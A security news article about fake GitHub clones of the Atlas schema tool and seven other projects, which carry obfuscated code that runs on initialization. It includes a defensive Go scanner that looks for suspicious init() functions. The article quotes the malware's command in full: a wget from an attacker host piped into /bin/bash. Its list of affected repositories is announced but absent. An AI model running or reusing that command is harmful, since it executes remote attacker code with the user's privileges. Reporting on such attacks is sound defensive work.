Israeli software engineer Ariel Mashraki raised the alarm on Reddit yesterday about a sophisticated attack targeting his popular open-source project and seven others on GitHub. According to Mashraki, attackers created a convincing clone of his project Atlas, boosted its credibility with fake user stars, and injected malicious code designed to execute on users’ systems.

Stealthy Supply Chain Attack

Atlas, a tool for managing and migrating database schemas using modern DevOps principles, has approximately 4,000 users and is widely adopted in Go projects. The malicious clones were designed to look legitimate while secretly carrying code that downloads and executes remote scripts on users’ machines.

“It’s hard to detect the full impact,” Mashraki explained in his post. “The attacker obfuscates the code by changing identifiers and scrambling the order of the byte array, so you can’t easily search for it on GitHub. This makes it nearly impossible to track the full impact unless GitHub steps in and helps resolve this issue.”

Mashraki reported the compromised repositories to GitHub support and shared examples of the malicious code with the community. The malicious injection executes the following command on initialization:

wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &

This command fetches a script from a remote server and pipes it straight into /bin/bash, running it in the background with whatever privileges the user who ran the tool has, which gives the attacker a foothold on the affected system.
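As an added example (not from the article or the Atlas project), here is a small Go heuristic a defender could run over a cloned repository's source before building it: it parses each file and flags init() functions that call through os/exec (alias-aware) or assemble large array literals, the two traits of the injection Mashraki describes. The function name and the 16-element threshold are my own choices; the sample source in main is constructed.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
)

// ScanInitFuncs reports, for each init() in one Go file, calls through os/exec and large array
// literals (the scrambled byte array described above). Heuristic written for this article, not Atlas code.
func ScanInitFuncs(filename, src string) ([]string, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	execName := "" // local name of os/exec in this file, honouring import aliases
	for _, im := range f.Imports {
		if p, _ := strconv.Unquote(im.Path.Value); p == "os/exec" {
			if execName = "exec"; im.Name != nil {
				execName = im.Name.Name
			}
		}
	}
	var findings []string
	for _, d := range f.Decls {
		if fn, ok := d.(*ast.FuncDecl); ok && fn.Name.Name == "init" && fn.Body != nil {
			ast.Inspect(fn.Body, func(n ast.Node) bool {
				switch x := n.(type) {
				case *ast.SelectorExpr: // pkg.Func where pkg is the os/exec import
					if id, ok := x.X.(*ast.Ident); ok && execName != "" && id.Name == execName {
						findings = append(findings, fmt.Sprintf("line %d: os/exec.%s called from init()", fset.Position(n.Pos()).Line, x.Sel.Name))
					}
				case *ast.CompositeLit: // []T{...} with many elements, as in an obfuscated payload
					if _, ok := x.Type.(*ast.ArrayType); ok && len(x.Elts) >= 16 {
						findings = append(findings, fmt.Sprintf("line %d: %d-element array literal built in init()", fset.Position(n.Pos()).Line, len(x.Elts)))
					}
				}
				return true
			})
		}
	}
	return findings, nil
}

func main() {
	const sample = "package p\nimport x \"os/exec\"\nfunc init() {\n\tb := []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}\n\t_ = x.Command(\"sh\", \"-c\", string(b)).Start()\n}\n" // constructed sample
	fmt.Println(ScanInitFuncs("sample.go", sample))
}
```

Findings are a triage aid: review each flagged init() by hand, and compare the clone's source against the genuine upstream repository rather than trusting star counts.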

Multiple Projects Affected

Beyond his own project, Mashraki identified seven additional repositories containing similar malicious code:

Wider Security Implications

This incident highlights the growing sophistication of supply chain attacks targeting open-source software repositories. By creating convincing clones of legitimate projects and artificially enhancing their credibility, attackers exploit the trust developers place in community-vetted code.

The attack on Atlas is particularly concerning given its role in database management, where it runs with access to sensitive data environments. Organizations using any of these projects should immediately verify that their dependencies come from the genuine upstream repositories and check for indicators of compromise.

For the broader developer community, this incident serves as a reminder to verify package sources, inspect code changes during updates, and implement appropriate security measures when incorporating third-party dependencies. It also underscores the responsibility of platform providers like GitHub to develop more robust mechanisms for detecting and preventing such sophisticated impersonation attacks.

As open-source software continues to form the backbone of modern technology infrastructure, securing the software supply chain remains a critical challenge for the entire ecosystem.

Author

Editorial Team
The Editorial Team at Security Land is comprised of experienced professionals dedicated to delivering insightful analysis, breaking news, and expert perspectives on the ever-evolving threat landscape.